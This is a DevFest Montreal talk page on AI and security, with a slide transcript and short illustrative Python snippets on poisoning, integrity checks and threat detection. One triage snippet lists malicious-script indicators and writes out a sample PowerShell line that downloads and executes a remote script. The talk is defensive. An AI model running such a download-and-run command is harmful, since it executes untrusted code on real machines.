
AI and Security: A Double-Edged Sword? by Stacy Véronneau and Yan Bellerose

Imagine a world where your AI models are not just smart but also secure, and your security tools are supercharged with AI’s predictive power.

In this talk, we’ll dive into the two sides of the AI security coin:

Security in AI: We’ll explore how to protect your AI models in GCP from attacks, biases, and data breaches, ensuring they’re both robust and reliable.

Security with AI: Discover how GCP’s security tools leverage AI to detect threats, prevent attacks, and respond to incidents faster than ever before.

If you’re building or using AI in the cloud, this talk is your key to unlocking a future where AI innovation and security go hand-in-hand.

https://youtu.be/_phzlulmuy8
DevFest Montreal 2024

GDG Montreal

November 15, 2024

Transcript

  1. Stacy Véronneau: Passionate Cloud Evangelist and Technical Lead, blending my strong business acumen with a deep dive into cloud technologies. My journey in tech is fueled by a love for learning and sharing knowledge, especially in the realms of cloud integration and operations. Whether you're a cloud newbie or a seasoned professional, I'm here to engage in thoughtful discussions, collaborate on exciting projects, and share insights from my journey.
  2. Yan Bellerose: As a results-oriented technology enthusiast, I excel at bridging the gap between technical expertise, business objectives, and innovation. Known for delivering high-quality work and inspiring others, I possess a natural aptitude for adaptation and continuous learning, which enables me to quickly become effective in dynamic and fast-paced environments such as Google. Passionate about technology, I'm dedicated to staying at the forefront of emerging trends. My experience, ranging from customer engineering to security leadership roles, has equipped me with a deep understanding of the security industry.
  3. Our Topics For Today: • AI 101 • AI as a Security Threat • Security in AI • AI in Security • The Google Ecosystem • Conclusion • Q&A
  4. AI 101: AI is powerful but has both positive and negative implications (double-edged), especially in the security realm. But first, let's level-set, frame the conversation, and take a few steps back.
  5. AI as a Security Threat: The Dark Side. Potential risks and challenges posed by AI in security: • Adversarial attacks on AI systems • AI-powered cyberattacks • Deepfakes and misinformation • Privacy and surveillance issues • Ethical considerations
  6. Security in AI: Protecting the Protectors. Vulnerabilities galore: • Data Poisoning • Model Theft • Backdoors • Adversarial Attacks
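To make the first item on that list concrete, here is a minimal, invented sketch of data poisoning: an attacker who can inject mislabeled points into the training set shifts a toy nearest-centroid classifier's decision boundary and flips a prediction. The 1-D numbers are made up for illustration and are not from the talk.

```python
# Toy data-poisoning demo with a nearest-centroid classifier.

def centroid(points):
    return sum(points) / len(points)

def predict(x, c0, c1):
    """Return class 0 or 1, whichever centroid is closer."""
    return 0 if abs(x - c0) <= abs(x - c1) else 1

# Clean training data: class 0 clusters low, class 1 clusters high.
class0 = [1.0, 2.0]
class1 = [8.0, 9.0]
print(predict(6.0, centroid(class0), centroid(class1)))  # 1: closer to class 1

# Poisoning: attacker injects high-valued points mislabeled as class 0,
# dragging the class-0 centroid toward the test point.
poisoned0 = class0 + [7.0, 7.5]
print(predict(6.0, centroid(poisoned0), centroid(class1)))  # 0: prediction flipped
```

The same mechanism scales up: a small fraction of corrupted labels can move a real model's boundary in ways that are hard to spot from accuracy metrics alone.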
  7. Google's Secure AI Framework (SAIF): The potential of AI, especially generative AI, is immense. As innovation moves forward, the industry needs security standards for building and deploying AI responsibly. That's why we introduced the Secure AI Framework (SAIF), a conceptual framework to secure AI systems. SAIF is designed to address top-of-mind concerns for security professionals, such as AI/ML model risk management, security, and privacy, helping to ensure that when AI models are implemented, they're secure by default.
  8. Risks in the stages of the GenAI supply chain. [Diagram: pipeline stages Dataset → Pretrained model(s) → ML Framework → Train model → Model hub → Production model → Inference in production]
  9. Risks in the stages of the GenAI supply chain, mapped onto the same pipeline (Dataset → Pretrained model(s) → ML Framework → Train model → Model hub → Production model → Inference in production): • Source tampering • Inject vulnerability • Data poisoning • Unauthorized training data • Compromise model • Model poisoning • Bad model usage • Insecure integrated component • Model reverse engineering • Denial of ML service • Rogue actions
  10. Mitigations across the GenAI supply chain. [Diagram: the same pipeline and risks, with controls mapped onto the stages] • Library vulnerability analysis • Trusted source (for datasets, pretrained models, and frameworks) • Sensitive data protection • Network isolation • WAF & DDoS protection
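The "trusted source" control on that slide can be sketched very simply: before loading a model artifact, verify it against a digest published by the source you trust. This is a minimal illustration; the file contents and names are invented for the example, and real pipelines would pin digests through signed metadata rather than a bare string.

```python
# Sketch of a trusted-source integrity check for a model artifact.
import hashlib

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def verify_artifact(data: bytes, expected_digest: str) -> bool:
    # Recompute the digest of what we actually downloaded and compare
    # it to the digest pinned from the trusted source.
    return sha256_hex(data) == expected_digest

published = b"model-weights-v1"           # artifact as published
expected = sha256_hex(published)          # digest pinned at publish time

print(verify_artifact(published, expected))                 # True: untampered
print(verify_artifact(b"model-weights-v1-EVIL", expected))  # False: tampered
```

A check like this sits naturally at the "Model hub → Production model" hand-off, where a supply-chain attacker would otherwise be able to swap in a compromised model.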
  11. AI in Security: Enhancing Protection. AI is being used to improve security measures such as: • Threat detection and prevention • Vulnerability assessment • Incident response • Fraud detection • Cybersecurity automation
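As a tiny stand-in for the threat-detection idea above, this sketch flags events whose count deviates far from a learned baseline (a z-score rule). Real AI-driven detection uses far richer models; the login counts and the 3-sigma threshold here are invented for illustration.

```python
# Baseline anomaly detection: flag values far outside the normal range.
import statistics

def is_anomalous(value, baseline, threshold=3.0):
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline)  # population std dev of the baseline
    return abs(value - mean) / stdev > threshold

logins_per_hour = [10, 12, 11, 9, 10, 13, 11, 10]  # normal traffic baseline

print(is_anomalous(12, logins_per_hour))   # False: within normal variation
print(is_anomalous(95, logins_per_hour))   # True: possible brute-force spike
```

The point of the sketch is the workflow, not the statistics: learn what "normal" looks like, then surface the deviations for a human or an automated playbook to act on.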
  12. AI key use cases, by core capability:
    • Summarize. Why a specialized LLM is needed: complex and ever-growing security jargon is not well-represented in other training sets; help reduce the noise and increase the signal. Example opportunities: concisely explain the behavior of suspicious scripts; summarize relevant and actionable threat intelligence; SOC cases, intel reports, and attack paths.
    • Classify. Why a specialized LLM is needed: corrupt, malicious, and vulnerable data/code are not represented in other training sets. Example opportunities: classify malware (PowerShell, VBA, PHP, JavaScript); identify security vulnerabilities in code; threat relevance and risk.
    • Generate. Why a specialized LLM is needed: niche languages and data structures in the security domain are not well-represented in other training sets. Example opportunities: generate YARA-L detections; generate SOAR playbooks; security testing.
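The "Classify" row above would be served by a security-tuned LLM; as a hedged stand-in, this sketch triages a script with a few hand-written indicators so the shape of the task is concrete. The indicator list is illustrative only, not a real detection rule, and an LLM's value is precisely that it generalizes beyond such brittle string matching.

```python
# Indicator-based script triage as a stand-in for LLM classification.

SUSPICIOUS_INDICATORS = [
    "-encodedcommand",      # PowerShell encoded payloads
    "invoke-expression",    # dynamic PowerShell execution
    "eval(base64_decode",   # obfuscated PHP
    "downloadstring(",      # in-memory download-and-run
]

def triage_script(source: str) -> str:
    lowered = source.lower()
    hits = [ind for ind in SUSPICIOUS_INDICATORS if ind in lowered]
    return "suspicious" if hits else "benign"

print(triage_script("Get-ChildItem C:\\Users"))  # benign
print(triage_script(
    "IEX (New-Object Net.WebClient).DownloadString('http://x/p.ps1')"
))  # suspicious
```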
  13. The Google Cloud Ecosystem: AI and Security. • AI Superpowers: AI-powered security for rapid threat detection and response. • Security Command Center: panoramic security monitoring with AI. 🔭 • SecOps: AI threat detection that finds hidden attacks. • VirusTotal: AI-driven malware analysis and extermination. 🐛💥
  14. Google claims a world first as AI finds a 0-day security vulnerability. On November 1, 2024, an AI agent discovered a previously unknown, zero-day, exploitable memory-safety vulnerability in widely used real-world software. It's the first such find to be made public, according to Google's Project Zero and DeepMind, the teams behind Big Sleep, the large-language-model-assisted vulnerability agent that spotted the flaw.
  15. To harness the benefits of AI while mitigating the risks, it's crucial to: • Develop robust architectures and resilient AI models that resist adversarial attacks. • Prioritize ethical considerations in the design and deployment of AI security systems. • Invest in research and development to stay informed and ready to react to emerging threats and vulnerabilities. • Foster collaboration between industry, academia, and government to ensure responsible and secure AI innovation in the security domain.